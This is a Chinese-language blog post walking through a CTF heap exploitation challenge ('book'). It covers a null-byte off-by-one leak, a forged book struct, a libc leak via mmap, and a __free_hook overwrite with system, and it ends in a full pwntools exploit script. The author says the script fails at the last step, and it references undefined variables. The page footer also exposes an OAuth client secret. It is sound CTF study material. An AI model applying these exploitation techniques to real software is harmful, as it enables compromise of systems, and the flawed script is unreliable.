<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8">
  
  
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <title>
    off by one |
    
    summerN&#39;s blog</title>
  
    <link rel="shortcut icon" href="/favicon.ico">
  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<script src="/js/pace.min.js"></script>

<meta name="generator" content="Hexo 4.1.1"><link rel="alternate" href="/atom.xml" title="summerN's blog" type="application/atom+xml">
</head>

<body>
<main class="content">
  <section class="outer">
  

<article id="post-off by one" class="article article-type-post" itemscope itemprop="blogPost" data-scroll-reveal>
  
  <div class="article-inner">
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      off by one
    </h1>
  
  




      </header>
    

    
      <div class="article-meta">
        <a href="/2020/02/09/off%20by%20one/" class="article-date">
  <time datetime="2020-02-09T10:23:19.014Z" itemprop="datePublished">2020-02-09</time>
</a>
        
      </div>
    

    
      
    <div class="tocbot"></div>





    

    <div class="article-entry" itemprop="articleBody">
      


      

      
        <h1 id="off-by-one例题：book"><a href="#off-by-one例题：book" class="headerlink" title="off by one例题：book"></a>off by one例题：book</h1><a id="more"></a>

<p>这里我们需要简单介绍一下<code>__free_hook</code>函数<br> 当调用free函数的时候当__free_hook内容不为NULL时，会优先执行其内容，所以我们将该函数参数设置为system，就可以实现getshell</p>
<h2 id="步骤："><a href="#步骤：" class="headerlink" title="步骤："></a>步骤：</h2><p>题目是一个常见的选单式程序，功能是一个图书管理系统。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">1. Create a book</span><br><span class="line">2. Delete a book</span><br><span class="line">3. Edit a book</span><br><span class="line">4. Print book detail</span><br><span class="line">5. Change current author name</span><br><span class="line">6. Exit</span><br></pre></td></tr></table></figure>

<p>程序提供了创建、删除、编辑、打印图书的功能。题目是64位程序，保护如下所示。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Canary                        : No</span><br><span class="line">NX                            : Yes</span><br><span class="line">PIE                           : Yes</span><br><span class="line">Fortify                       : No</span><br><span class="line">RelRO                         : Full</span><br></pre></td></tr></table></figure>

<h3 id="create"><a href="#create" class="headerlink" title="create"></a>create</h3><p>book结构中存在name和description，name和description在堆上分配。首先分配name buffer，使用malloc，大小自定但小于32。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">printf(&quot;\nEnter book name size: &quot;, *(_QWORD *)&amp;size);</span><br><span class="line">__isoc99_scanf(&quot;%d&quot;, &amp;size);</span><br><span class="line">printf(&quot;Enter book name (Max 32 chars): &quot;, &amp;size);</span><br><span class="line">ptr &#x3D; malloc(size);</span><br></pre></td></tr></table></figure>

<p>之后分配description，同样大小自定但无限制。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">printf(&quot;\nEnter book description size: &quot;, *(_QWORD *)&amp;size);</span><br><span class="line">        __isoc99_scanf(&quot;%d&quot;, &amp;size);</span><br><span class="line"></span><br><span class="line">v5 &#x3D; malloc(size);</span><br></pre></td></tr></table></figure>

<p>之后分配book结构的内存</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">book &#x3D; malloc(0x20uLL);</span><br><span class="line">if ( book )</span><br><span class="line">&#123;</span><br><span class="line">    *((_DWORD *)book + 6) &#x3D; size;</span><br><span class="line">    *((_QWORD *)off_202010 + v2) &#x3D; book;</span><br><span class="line">    *((_QWORD *)book + 2) &#x3D; description;</span><br><span class="line">    *((_QWORD *)book + 1) &#x3D; name;</span><br><span class="line">    *(_DWORD *)book &#x3D; ++unk_202024;</span><br><span class="line">    return 0LL;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="漏洞"><a href="#漏洞" class="headerlink" title="漏洞"></a>漏洞</h3><p>程序编写的read函数存在null byte off-by-one漏洞，仔细观察这个read函数可以发现对于边界的考虑是不当的。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">signed __int64 __fastcall my_read(_BYTE *ptr, int number)</span><br><span class="line">&#123;</span><br><span class="line">  int i; &#x2F;&#x2F; [rsp+14h] [rbp-Ch]</span><br><span class="line">  _BYTE *buf; &#x2F;&#x2F; [rsp+18h] [rbp-8h]</span><br><span class="line"></span><br><span class="line">  if ( number &lt;&#x3D; 0 )</span><br><span class="line">    return 0LL;</span><br><span class="line">  buf &#x3D; ptr;</span><br><span class="line">  for ( i &#x3D; 0; ; ++i )</span><br><span class="line">  &#123;</span><br><span class="line">    if ( (unsigned int)read(0, buf, 1uLL) !&#x3D; 1 )</span><br><span class="line">      return 1LL;</span><br><span class="line">    if ( *buf &#x3D;&#x3D; &#39;\n&#39; )</span><br><span class="line">      break;</span><br><span class="line">    ++buf;</span><br><span class="line">    if ( i &#x3D;&#x3D; number )</span><br><span class="line">      break;</span><br><span class="line">  &#125;</span><br><span class="line">  *buf &#x3D; 0;</span><br><span class="line">  return 0LL;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<p>根据调试已经ida静态查看，我们发现有如下结构体book</p>
<p>struct book:</p>
<p>​    id;</p>
<p>​    *name</p>
<p>​    *description</p>
<p>​    size</p>
<h3 id="1-泄漏"><a href="#1-泄漏" class="headerlink" title="1.泄漏"></a>1.泄漏</h3><p>因为程序中的my_read函数存在null byte  off-by-one，事实上my_read读入的结束符’\x00’是写入到0x555555756060的位置的。这样当0x555555756060～0x555555756068写入book指针时就会覆盖掉结束符’\x00’，所以这里是存在一个地址泄漏的漏洞。通过打印author name就可以获得pointer array中第一项的值。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">0x555555756040: 0x6161616161616161  0x6161616161616161</span><br><span class="line">0x555555756050: 0x6161616161616161  0x6161616161616161   &lt;&#x3D;&#x3D; author name</span><br><span class="line">0x555555756060: 0x0000555555757480 &lt;&#x3D;&#x3D; pointer array    0x0000000000000000</span><br><span class="line">0x555555756070: 0x0000000000000000  0x0000000000000000</span><br><span class="line">0x555555756080: 0x0000000000000000  0x0000000000000000</span><br></pre></td></tr></table></figure>

<p>为了实现泄漏，首先在author name中需要输入32个字节来使得结束符被覆盖掉。之后我们创建book1，这个book1的指针会覆盖</p>
<h4 id="这里注意："><a href="#这里注意：" class="headerlink" title="这里注意："></a>这里注意：</h4><p>我们ida查看的时候按照ida给的形式是无法实现的，但是通过自己调试发现是可以实现的，这里告诉我们还是要多调试</p>
<p>具体为：我们先将32个字符填满，导致\x00被覆盖，之后我们申请book的地址会覆盖溢出到下面的\x00，通过printf函数可以进行泄露我们申请的第一个book堆的地址（printf函数存在00截断）</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">auther_name(<span class="string">'a'</span>*<span class="number">32</span>)</span><br><span class="line"></span><br><span class="line">create_book(<span class="string">'c'</span>,<span class="number">208</span>,<span class="string">'b'</span>,<span class="number">32</span>) <span class="comment">#此处需要自己计算第一个size的大小，另覆盖后的地址指向des</span></span><br><span class="line"></span><br><span class="line">print_detail()</span><br><span class="line">p.recvuntil(<span class="string">'a'</span>*<span class="number">32</span>)</span><br><span class="line">first_book_add = u64(p.recv(<span class="number">6</span>).strip(<span class="string">'\n'</span>).ljust(<span class="number">8</span>,<span class="string">'\x00'</span>))</span><br><span class="line"><span class="keyword">print</span> hex(first_book_add)</span><br></pre></td></tr></table></figure>

<h3 id="2-伪造book"><a href="#2-伪造book" class="headerlink" title="2.伪造book"></a>2.伪造book</h3><p>我们发现存在edit author name的功能，这样的话我们可以佳宁我们申请到的第一个book堆的地址的最后两位进行覆盖，得到一个新的地址，而此时，这个新的地址就是我们的伪造book，并且系统默认其为id=1的book</p>
<p>同时，我们发现该程序存在一个函数可以修改description，如果我们将这个最后12位被覆盖的地址指向第一个book的des部分，我们就可以实现对其的写入</p>
<p>所以我们可以根据我们的计算结果去申请第一个book堆</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">create_book(<span class="string">'c'</span>,<span class="number">208</span>,<span class="string">'b'</span>,<span class="number">32</span>) <span class="comment">#此处需要自己计算第一个size的大小，另覆盖后的地址指向des</span></span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">payload1 = p64(<span class="number">1</span>)+p64(first_book_add+<span class="number">0x38</span>)+p64(first_book_add+<span class="number">0x38</span>)+p64(<span class="number">0xffff</span>) <span class="comment">#这里add+0x38是为了指向book2的name，因为分配中的chunk的pre与size可以用来存放上一个堆的数据</span></span><br><span class="line">edit(<span class="number">1</span>,payload1)</span><br></pre></td></tr></table></figure>

<h3 id="3-泄露libc基地址"><a href="#3-泄露libc基地址" class="headerlink" title="3.泄露libc基地址"></a>3.泄露libc基地址</h3><p>1.我们发现我们可以使用改程序的show功能输出book结构体的所有数据</p>
<p>那么我们就可以根据我们伪造的book的内容指向来获取book2的name地址</p>
<p>2.这道题的巧妙之处在于在分配第二个book时，使用一个很大的尺寸，使得堆以mmap模式进行拓展。我们知道堆有两种拓展方式一种是brk会直接拓展原来的堆，另一种是mmap会单独映射一块内存。</p>
<p>在这里我们申请一个超大的块，来使用mmap扩展内存。因为mmap分配的内存与libc之前存在固定的偏移因此可以推算出libc的基地址。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">create_book(<span class="string">'aa'</span>,<span class="number">0x21000</span>,<span class="string">'bb'</span>,<span class="number">0x21000</span>)</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">change_name(<span class="string">'a'</span>*<span class="number">32</span>) <span class="comment">#将第一个book的地址最低两位覆盖</span></span><br><span class="line">print_detail()</span><br><span class="line">p.recvuntil(<span class="string">'Name: '</span>)</span><br><span class="line">name_add=u64(p.recvline().strip(<span class="string">'\n'</span>).ljust(<span class="number">8</span>,<span class="string">'\x00'</span>))</span><br><span class="line"><span class="keyword">print</span> hex(name_add)</span><br></pre></td></tr></table></figure>

<p>但是偏移这一块我还是没大看懂，lib基地址是不断变化的，但是偏移是不变的，所以我们先看一下偏移</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#offset = name_add-0x7ffff7a0d000</span></span><br><span class="line"><span class="comment">#我们需要先通过调试将其算出来，刚开始做的时候这里做错了</span></span><br><span class="line">libc_add = name_add - offset</span><br><span class="line"><span class="keyword">print</span> hex(libc_add)</span><br></pre></td></tr></table></figure>

<p><img src="https://s2.ax1x.com/2020/02/09/1hKmS1.png" alt="1hKmS1.png"></p>
<p>众所周知mmap分配的空间是在堆与栈之间分配的</p>
<h3 id="4-getshell"><a href="#4-getshell" class="headerlink" title="4.getshell"></a>4.getshell</h3><p>通过上面我们可以获取/bin/sh与system与free__hook的地址</p>
<p>1.我们将前两个地址通过edit（1）可以将book2结构体中存储的name以及des得地址进行覆盖</p>
<p>2.之后可以通过edit（2）将free_hook指向的空间设置为system，这样就可以getshell了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">free_hook = libc.symbols[<span class="string">'__free_hook'</span>] + libc_base</span><br><span class="line"><span class="keyword">print</span> hex(free_hook)</span><br><span class="line">sys_add = libc.symbols[<span class="string">'system'</span>] +libc_base</span><br><span class="line"><span class="keyword">print</span> hex(sys_add)</span><br><span class="line">bin_add = libc.search(<span class="string">'/bin/sh'</span>).next() + libc_base</span><br><span class="line"><span class="keyword">print</span> hex(bin_add)</span><br><span class="line">excu_add = libc_base + <span class="number">0x4526a</span></span><br><span class="line"><span class="comment">##getshell</span></span><br><span class="line">payload2 = p64(free_hook) + p64(free_hook) <span class="comment">#fake_book的des指向的是book2的name，我们输入payload会将book的name地址与des地址分别覆盖为free_hook</span></span><br><span class="line">edit(<span class="number">1</span>,payload2)</span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line">payload3 = p64(sys_add) <span class="comment">#将book2的des的内容设置为sys地址就是将freehook的内容设置为sys_add，这样调用free的时候就会调用sys</span></span><br><span class="line"><span class="comment">#edit(2,payload3)</span></span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line">p.recvuntil(<span class="string">'&gt;'</span>)</span><br><span class="line">p.sendline(<span class="string">'3'</span>)</span><br><span class="line">p.recvuntil(<span class="string">'Enter the book id you want to edit: '</span>)</span><br><span class="line">p.sendline(<span class="string">'2'</span>)</span><br><span class="line">p.recvuntil(<span class="string">'Enter new book description: '</span>)</span><br><span class="line">p.sendline(payload3)</span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line">deleate(<span class="number">2</span>) <span class="comment">#调用free时，本该先为free(book_name),现在变成了system(/bin/sh)</span></span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br></pre></td></tr></table></figure>

<h3 id="最后"><a href="#最后" class="headerlink" title="最后"></a>最后</h3><p>我自认为我这个脚本的逻辑很清楚，但是到最后edit（2）的时候就是</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">p.recvuntil(<span class="string">'&gt;'</span>)</span><br><span class="line">p.sendline(<span class="string">'3'</span>)</span><br><span class="line">p.recvuntil(<span class="string">'Enter the book id you want to edit: '</span>)</span><br><span class="line">p.sendline(<span class="string">'2'</span>)</span><br><span class="line">p.recvuntil(<span class="string">'Enter new book description: '</span>)</span><br><span class="line">p.sendline(payload3)</span><br></pre></td></tr></table></figure>

<p>当运行到这里的时候，程序总会出现edit description错误，感觉没啥问题，但是就是不行</p>
<p>还请大佬们指教</p>
<p>半完结，半撒花=。=</p>
<p>基础知识：</p>
<p>libc基地址每次调用都会变化</p>
<p>最后上完整exp：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#-*- coding: UTF-8 -*- </span></span><br><span class="line"><span class="comment">#!/usr/bin/python2</span></span><br><span class="line"><span class="comment">#__author__='summerN@DL&amp;S'</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">file_name = <span class="string">'./pwn'</span></span><br><span class="line"></span><br><span class="line">libc_name = <span class="string">'/lib/x86_64-linux-gnu/libc.so.6'</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#ip = ''</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#port = ''</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#context.arch = 'amd64'</span></span><br><span class="line"></span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line">context.terminal=[<span class="string">'tmux'</span>,<span class="string">'split'</span>,<span class="string">'-h'</span>]</span><br><span class="line"></span><br><span class="line">libc = ELF(libc_name)</span><br><span class="line"></span><br><span class="line">elf = ELF(file_name)</span><br><span class="line"></span><br><span class="line">p = process(file_name)</span><br><span class="line"></span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">create_book</span><span class="params">(name,size1,des,size2)</span>:</span></span><br><span class="line"></span><br><span class="line">	p.recvuntil(<span class="string">'&gt; '</span>)</span><br><span class="line">	</span><br><span class="line">	p.sendline(<span class="string">"1"</span>)</span><br><span class="line">	</span><br><span class="line">	p.recvuntil(<span class="string">": "</span>)</span><br><span class="line">	</span><br><span class="line">	p.sendline(str(size1))</span><br><span class="line">	</span><br><span class="line">	p.recvuntil(<span class="string">'Enter book name (Max 32 chars):'</span>)</span><br><span class="line">	</span><br><span class="line">	p.sendline(str(name))</span><br><span class="line">	</span><br><span class="line">	p.recvuntil(<span class="string">'Enter book description size:'</span>)</span><br><span class="line">	</span><br><span class="line">	p.sendline(str(size2))</span><br><span class="line">	</span><br><span class="line">	p.recvuntil(<span class="string">'Enter book description:'</span>)</span><br><span class="line">	</span><br><span class="line">	p.sendline(str(des))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">deleate</span><span class="params">(index)</span>:</span></span><br><span class="line"></span><br><span class="line">	p.recvuntil(<span class="string">'&gt;'</span>)</span><br><span class="line">	</span><br><span class="line">	p.sendline(<span class="string">'2'</span>)</span><br><span class="line">	</span><br><span class="line">	p.recvuntil(<span class="string">'Enter the book id you want to delete:'</span>)</span><br><span class="line">	</span><br><span class="line">	p.send(str(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span><span class="params">(id_a,new_des)</span>:</span></span><br><span class="line"></span><br><span class="line">	p.recvuntil(<span class="string">'&gt;'</span>)</span><br><span class="line">	</span><br><span class="line">	p.sendline(<span class="string">'3'</span>)</span><br><span class="line">	</span><br><span class="line">	p.recvuntil(<span class="string">'Enter the book id you want to edit: '</span>)</span><br><span class="line">	</span><br><span class="line">	p.sendline(str(id_a))</span><br><span class="line">	</span><br><span class="line">	p.recvuntil(<span class="string">'Enter new book description: '</span>)</span><br><span class="line">	</span><br><span class="line">	p.sendline(new_des)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">print_detail</span><span class="params">()</span>:</span></span><br><span class="line"></span><br><span class="line">	p.recvuntil(<span class="string">'&gt; '</span>)</span><br><span class="line">	</span><br><span class="line">	p.sendline(<span class="string">'4'</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">change_name</span><span class="params">(name)</span>:</span></span><br><span class="line"></span><br><span class="line">	p.recvuntil(<span class="string">'&gt;'</span>)</span><br><span class="line">	</span><br><span class="line">	p.sendline(<span class="string">'5'</span>)</span><br><span class="line">	</span><br><span class="line">	p.recvuntil(<span class="string">'Enter author name:'</span>)</span><br><span class="line">	</span><br><span class="line">	p.sendline(str(name))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">auther_name</span><span class="params">(name)</span>:</span></span><br><span class="line"></span><br><span class="line">	p.recvuntil(<span class="string">'Enter author name:'</span>)</span><br><span class="line">	</span><br><span class="line">	p.sendline(str(name))</span><br><span class="line"></span><br><span class="line">auther_name(<span class="string">'a'</span>*<span class="number">32</span>)</span><br><span class="line"></span><br><span class="line">create_book(<span class="string">'c'</span>,<span class="number">208</span>,<span class="string">'b'</span>,<span class="number">32</span>) <span class="comment">#此处需要自己计算第一个size的大小，另覆盖后的地址指向des</span></span><br><span class="line"></span><br><span class="line">print_detail()</span><br><span class="line">p.recvuntil(<span class="string">'a'</span>*<span class="number">32</span>)</span><br><span class="line">first_book_add = u64(p.recv(<span class="number">6</span>).strip(<span class="string">'\n'</span>).ljust(<span class="number">8</span>,<span class="string">'\x00'</span>))</span><br><span class="line"><span class="keyword">print</span> hex(first_book_add)</span><br><span class="line"></span><br><span class="line"><span class="comment">#p.recvline()</span></span><br><span class="line">create_book(<span class="string">'aa'</span>,<span class="number">0x21000</span>,<span class="string">'bb'</span>,<span class="number">0x21000</span>)</span><br><span class="line"></span><br><span class="line">payload1 = p64(<span class="number">1</span>)+p64(first_book_add+<span class="number">0x38</span>)+p64(first_book_add+<span class="number">0x38</span>)+p64(<span class="number">0xffff</span>) <span class="comment">#这里add+0x38是为了指向book2的name，因为分配中的chunk的pre与size可以用来存放上一个堆的数据</span></span><br><span class="line">edit(<span class="number">1</span>,payload1)</span><br><span class="line">change_name(<span class="string">'a'</span>*<span class="number">32</span>) <span class="comment">#将第一个book的地址最低两位覆盖</span></span><br><span class="line">print_detail()</span><br><span class="line">p.recvuntil(<span class="string">'Name: '</span>)</span><br><span class="line">name_add=u64(p.recvline().strip(<span class="string">'\n'</span>).ljust(<span class="number">8</span>,<span class="string">'\x00'</span>))</span><br><span class="line"><span class="keyword">print</span> hex(name_add)</span><br><span class="line"><span class="comment">#offset = name_add-0x7ffff7a0d000</span></span><br><span class="line"><span class="comment">#我们需要先通过调试将其算出来，刚开始做的时候这里做错了</span></span><br><span class="line">libc_add = name_add - offset</span><br><span class="line"><span class="keyword">print</span> hex(libc_add)</span><br><span class="line">free_hook = libc.symbols[<span class="string">'__free_hook'</span>] + libc_base</span><br><span class="line"><span class="keyword">print</span> hex(free_hook)</span><br><span class="line">sys_add = libc.symbols[<span class="string">'system'</span>] +libc_base</span><br><span class="line"><span class="keyword">print</span> hex(sys_add)</span><br><span class="line">bin_add = libc.search(<span class="string">'/bin/sh'</span>).next() + libc_base</span><br><span class="line"><span class="keyword">print</span> hex(bin_add)</span><br><span class="line">excu_add = libc_base + <span class="number">0x4526a</span></span><br><span class="line"><span class="comment">##getshell</span></span><br><span class="line">payload2 = p64(free_hook) + p64(free_hook) <span class="comment">#fake_book的des指向的是book2的name，我们输入payload会将book的name地址与des地址分别覆盖为free_hook</span></span><br><span class="line">edit(<span class="number">1</span>,payload2)</span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line">payload3 = p64(sys_add) <span class="comment">#将book2的des的内容设置为sys地址就是将freehook的内容设置为sys_add，这样调用free的时候就会调用sys</span></span><br><span class="line"><span class="comment">#edit(2,payload3)</span></span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line">p.recvuntil(<span class="string">'&gt;'</span>)</span><br><span class="line">p.sendline(<span class="string">'3'</span>)</span><br><span class="line">p.recvuntil(<span class="string">'Enter the book id you want to edit: '</span>)</span><br><span class="line">p.sendline(<span class="string">'2'</span>)</span><br><span class="line">p.recvuntil(<span class="string">'Enter new book description: '</span>)</span><br><span class="line">p.sendline(payload3)</span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line">deleate(<span class="number">2</span>) <span class="comment">#调用free时，本该先为free(book_name),现在变成了system(/bin/sh)</span></span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>



      
    </div>
    <footer class="article-footer">
      <a data-url="http://yoursite.com/2020/02/09/off%20by%20one/" data-id="ck6kf9nqv000cegluc3pd8rvd"
         class="article-share-link">Share</a>
      
    </footer>

  </div>

  
    
  <nav class="article-nav">
    
      <a href="/2020/02/11/%E9%80%9A%E8%BF%872017%200ctf%20babyheap%20%E5%AD%A6%E4%B9%A0unsortbin%E6%B3%84%E9%9C%B2libc%E5%9C%B0%E5%9D%80/" class="article-nav-link">
        <strong class="article-nav-caption">Newer posts</strong>
        <div class="article-nav-title">
          
            通过2017 0ctf babyheap 学习unsortbin泄露libc地址
          
        </div>
      </a>
    
    
      <a href="/2020/02/03/Use%20after%20free/" class="article-nav-link">
        <strong class="article-nav-caption">Olde posts</strong>
        <div class="article-nav-title">Use after free</div>
      </a>
    
  </nav>


  

  
    
  <div class="gitalk" id="gitalk-container"></div>
  
<link rel="stylesheet" href="https://unpkg.com/gitalk/dist/gitalk.css">

  
<script src="https://unpkg.com/gitalk/dist/gitalk.min.js"></script>

  
<script src="https://cdn.bootcss.com/blueimp-md5/2.10.0/js/md5.min.js"></script>

  <script type="text/javascript">
    var gitalk = new Gitalk({
      clientID: '665e1db541e975225bc6',
      clientSecret: '525f3534fe6005375cf8c02330ed09a2b7aab7d5',
      repo: 'talk',
      owner: 'summerN',
      admin: ['summerN'],
      // id: location.pathname,      // Ensure uniqueness and length less than 50
      id: md5(location.pathname),
      distractionFreeMode: false,  // Facebook-like distraction free mode
      pagerDirection: 'last'
    })

  gitalk.render('gitalk-container')
  </script>

  

</article>



</section>
  <footer class="footer">
  <div class="outer">
    <div class="float-right">
      <ul class="list-inline">
  
    <li><i class="fe fe-smile-alt"></i> <span id="busuanzi_value_site_uv"></span></li>
  
</ul>
    </div>
    <ul class="list-inline">
      <li>&copy; 2020 summerN&#39;s blog</li>
      <li>Powered by <a href="http://hexo.io/" target="_blank">Hexo</a></li>
